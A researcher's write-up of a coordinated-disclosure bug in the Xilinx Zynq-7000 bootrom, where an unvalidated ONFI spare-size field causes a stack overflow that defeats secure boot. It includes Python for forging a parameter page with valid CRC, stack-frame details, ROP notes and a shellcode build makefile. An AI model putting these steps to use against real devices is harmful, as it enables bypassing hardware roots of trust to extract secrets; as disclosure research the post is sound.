Introduction
Also known via DAAR-76201.
If you're just tuning in now and want context beyond "here's a bug in some rom code": Check out part 1 and part 2. I'll wait here.
Now - The Zynq-7000 series provides a root-of-trust via the usual methods: eFuse array containing hashes and/or keys. The actual scheme seems solid - I'm absolutely no cryptographer - and the implementation details that Xilinx doesn't document don't really expose anything particularly damning.
TL;DR
Zynq secureboot is not sufficient to protect secrets against an attacker with physical access. If you rely on this root of trust to protect a secret that is not unique per-device, reconsider your architecture.
Yes, you can probably recover bitstreams this way - I have not yet tried, but there is no reason that shouldn't work.
Bug
The Zynq ROM ONFI driver fails to do any validation of the ONFI parameter page. In normal flash devices this isn't configurable, but it's still technically untrusted data... And it has a lot of interesting fields that nominally dictate the organization and layout of the flash device (ECC, bad blocks, spare area, and so on).
An "emulator" that controls all of these fields is needed to exploit this, so we have to build one.
When the bootrom initially scans for ONFI devices, it grabs this parameter page and populates local copies of some of these fields (this function is nearly identical to Onfi_NandInit in the Xilinx xnandps driver).
Of particular (easiest-to-exploit) interest is SpareBytesPerPage - Everything else just needs to be legitimate enough to make it past some minimal checks. Since raw NAND is a disaster, it's not uncommon for the chips to have some built-in-ECC - We can bypass all of the logic related to this just by reporting a manufacturer ID of any value but Micron's ID (0x2c).
Finally, there's a CRC at the end. Using crcmod it looks a little like: crcmod.mkCrcFun(0x18005, initCrc=0x4f4e, rev=False)
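For anyone without crcmod handy, here is a minimal sketch of the same CRC in plain Python, plus a toy parameter page that uses it. The byte offsets (JEDEC ID at 64, data bytes per page at 80, spare bytes per page at 84, CRC at 254, little-endian) are my reading of the ONFI parameter page layout and should be checked against the spec. build_param_page, the 2048-byte page size, and the 0x01 manufacturer ID are made up for illustration. Every other field is left zeroed here and would need plausible values to get past the bootrom's checks.

```python
import struct

def onfi_crc16(data: bytes, init: int = 0x4F4E) -> int:
    """Bitwise CRC-16: polynomial 0x8005, MSB first, no reflection, no final XOR."""
    crc = init
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x8005) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc

def build_param_page(spare_bytes_per_page: int, jedec_id: int = 0x01) -> bytes:
    """Hypothetical helper: a 256-byte parameter page with a chosen spare size."""
    page = bytearray(256)
    page[0:4] = b"ONFI"                                      # page signature
    page[64] = jedec_id                                      # anything but 0x2c (Micron)
    struct.pack_into("<I", page, 80, 2048)                   # data bytes per page (assumed)
    struct.pack_into("<H", page, 84, spare_bytes_per_page)   # the interesting field
    # The CRC covers bytes 0..253 and is stored in the last two bytes.
    struct.pack_into("<H", page, 254, onfi_crc16(bytes(page[:254])))
    return bytes(page)

page = build_param_page(0xFFFF)
```

The spare size is a 16-bit field, so 0xFFFF is the largest value this sketch can advertise.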
Once the context is populated, and after some housekeeping (XNandPs_CfgInitialize), the bootrom searches for the ONFI "Bad Block Table".
Since NAND is so error-prone, there's a standardized (ish) method to provide a bitmap of known unusable whole blocks, and this is stored (along with ECC data) in the "spare area" of flash pages. Usually this is all nicely aligned so that addressing is somewhat as simple as masking out a couple bits, but the important part here is that this is the first time a value from our parameter page is used - XNandPs_ReadSpareBytes does no sanity checks before happily reading the entire spare page (per the descriptor) into the supplied buffer.
Since the buffer in question is a 0x200 long stack variable in XNandPs_SearchBbt's frame, we have a trivial stack smash with very good control. (It's even better than that - LR gets incidentally set to the top of this buffer...I didn't end up using this.) We can even control the return value of XNandPs_ReadSpareBytes by supplying or not supplying the bad block table signature (Bbt0). Register control is likewise very strong, R4 thru R11 are saved and restored from the smashed frame:
[sp+0x000]
[sp+0x008] destination buffer
[...]
[sp+0x..4] other vars
[sp+0x..8] saved r4
[sp+0x..C] saved r5
[...]
[sp+0x..C] saved pc
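To put a number on the missing check, here is a small model of the read length against the 0x200-byte buffer. It is only a sketch: bytes_past_buffer and checked_spare_len are hypothetical names, and nothing here reflects the actual frame offsets, which I've left elided above.

```python
BUF_LEN = 0x200  # size of the stack buffer in XNandPs_SearchBbt, per the text above

def bytes_past_buffer(spare_bytes_per_page: int, buf_len: int = BUF_LEN) -> int:
    """Bytes an unchecked read of the whole spare area writes beyond the buffer."""
    return max(0, spare_bytes_per_page - buf_len)

def checked_spare_len(spare_bytes_per_page: int, buf_len: int = BUF_LEN) -> int:
    """The sort of sanity check that is absent: reject descriptors larger than the buffer."""
    if spare_bytes_per_page > buf_len:
        raise ValueError("spare area larger than destination buffer")
    return spare_bytes_per_page

# A typical small spare area fits; the largest 16-bit value does not.
fits = bytes_past_buffer(64)
overflow = bytes_past_buffer(0xFFFF)
```

With the maximum 16-bit spare size, the read runs far past the buffer and into the saved registers and return address.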
The only remotely complex part about exploiting this is, well, the fact that it sits behind the ONFI interface. Luckily I had one of those Antminer boards kicking around, and they boot off ONFI NAND, so a bit of hot air and a handful of bodge-wire joints later, it was broken out:
[Image: ONFI/NAND interface breakout]
ONFI?
I'll spare you the details of the ONFI emulation (and my code), but it's a pretty straightforward interface that shares a lot more with old-school address buses than with the relatively higher-speed serialized communications of most other bulk storage (ok, mostly just *SPI, I guess). Kinda fun to write.
My emulation implements only the bare subset of ONFI commands needed to reach this point: all told, something like 7 ONFI commands plus some state management - ONFI allows for a couple of commands during a busy cycle (i.e. while buffering or erasing a page). Since the overflow is within the first page read ever submitted, I can just naively spit out the payload and ignore addressing entirely. After gluing in some BRAM and a bit of JTAG code to push payloads up to the FPGA, I got the bootrom to fault, and then to jump to the UART handler.
Exploit
Obviously this isn't sufficient - The Zynq boots with JTAG disabled and all kinds of interesting security features unlocked, plus it would be fun to debug the bootrom...
To rapidly prototype the payload/shellcode, I put together a tiny makefile to convince the linker to base everything at 0 as initially I had no idea where in RAM I was - I tried calculating it at some point and ended up being wildly off. Here's a copy, in case it's useful to someone:
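# Toolchain (bare-metal ARM binutils)
as = arm-none-eabi-as
objcopy = arm-none-eabi-objcopy
objdump = arm-none-eabi-objdump
ld = arm-none-eabi-ld
proj = sc

.PHONY: all disas clean
all: $(proj).bin

# Disassemble the flat binary
disas: $(proj).bin
	$(objdump) -D $(proj).bin -b binary -m armv7

# Assemble, link with text and data based at 0, then dump a raw blob
$(proj).bin: $(proj).s
	$(as) -o $(proj).o $(proj).s
	$(ld) $(proj).o -Ttext 0 -Tdata 0 -o $(proj).elf
	$(objcopy) -O binary $(proj).elf $(proj).bin

clean:
	rm -f $(proj).o $(proj).elf $(proj).bin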
Although I had control, I was running into issues with the exploit. The goal was to poke a stub into RAM (push sp; pop pc), and jump right into the stack that way - but it wasn't working.
The ROP seemed fine, but as soon as I jumped into shellcode everything broke. Thankfully I had one bit of output - I could jump to the UART bootloader and cause it to bring up the UART and emit the "XLNX-ZYNQ" identification string. After chasing the issue through what I was certain was caching (no: they're off), then ordering (easy to ROP to dsb/isb), then page permissions (off, wrote a chain to reconfigure them nevertheless)...I had the endianness flipped (thank you pwntools). So, lots of this could've been simpler.
Really, with all that effort it would've been simpler to just write a chain to re-enable JTAG and debug it normally...
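The endianness mix-up is easy to reproduce. Here is a minimal sketch using only the standard library, assuming the usual little-endian ARM configuration. pack_chain is a hypothetical helper and the word values are placeholders, not real gadget addresses.

```python
import struct

def pack_chain(words, little_endian=True):
    """Pack a list of 32-bit words into the raw bytes that land on the stack."""
    fmt = ("<" if little_endian else ">") + "I" * len(words)
    return struct.pack(fmt, *words)

chain = [0x00001234, 0xDEADBEEF]  # placeholder values for illustration only

right = pack_chain(chain)                       # what a little-endian core expects
wrong = pack_chain(chain, little_endian=False)  # the flipped version

print(right.hex())
print(wrong.hex())
```

Both outputs are the same length and look equally plausible in a hex dump, which is part of why this kind of mistake can hide for so long.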
Nevertheless, once my shellcode worked I could clean everything up and figure out where in memory I was. One thing to be aware of at this point is that any exceptions will cause the Zynq to reboot. The IVT can be remapped, but this comes at the cost of remapping some RAM away from the ROM. Perhaps this could be solved by setting up a couple virtual pages...But I am quite satisfied where things are, so you can do that ;)
Another benefit of using a "proper" assembler to build the payload is that I had access to handy macros for math and padding - arm-none-eabi-as is better at simple addition than I am, especially after midnight. I don't think there's any reason to release the whole ONFI tool, but here's the assembler file I used to build the payload.
Zynq Bootrom unlocked:
sctlr: 0x8C50079, devcfg: 0x4E00607F, ocmcfg: 0x0
The shellcode simply unlocks JTAG, and spits out a few registers of interest: devcfg contains the fabric config, including AES enable bits. sctlr is the ARM core register which contains caching, prediction, and virtual memory enable bits. ocmcfg is just the OCM configuration register. Everything the payload touches is documented in the TRM, but perhaps it makes this easier to follow.
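If you want to pick the sctlr value apart, here is a small sketch that extracts the enable bits mentioned above. The bit positions are my reading of the ARMv7-A SCTLR layout and are worth double-checking against the architecture manual. decode_sctlr is a hypothetical helper.

```python
# Bit positions assumed from the ARMv7-A SCTLR definition.
SCTLR_BITS = {
    "M (MMU enable)": 0,
    "A (alignment check)": 1,
    "C (data cache enable)": 2,
    "Z (branch prediction enable)": 11,
    "I (instruction cache enable)": 12,
    "V (high exception vectors)": 13,
}

def decode_sctlr(value: int) -> dict:
    """Return each named SCTLR bit as 0 or 1."""
    return {name: (value >> bit) & 1 for name, bit in SCTLR_BITS.items()}

for name, bit in decode_sctlr(0x8C50079).items():
    print(f"{name}: {bit}")
```

Feeding it the sctlr value printed by the shellcode shows which of these bits were set when the payload ran.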
Finally, I want to say that I cannot overstate how many random little rabbitholes I spent time chasing down, or how many tiny little things prevented another bug from being exploitable. So it goes.
Demo?
Demo:
Disclosure notes
I don't think the exact timeline is particularly useful - Suffice to say that while Xilinx was difficult to initially get ahold of, they were usually responsive, always competent and straightforward. They did pay out a bounty. The bug was reproduced in a couple weeks, and their advisory was published just inside of 90 days. Good work :)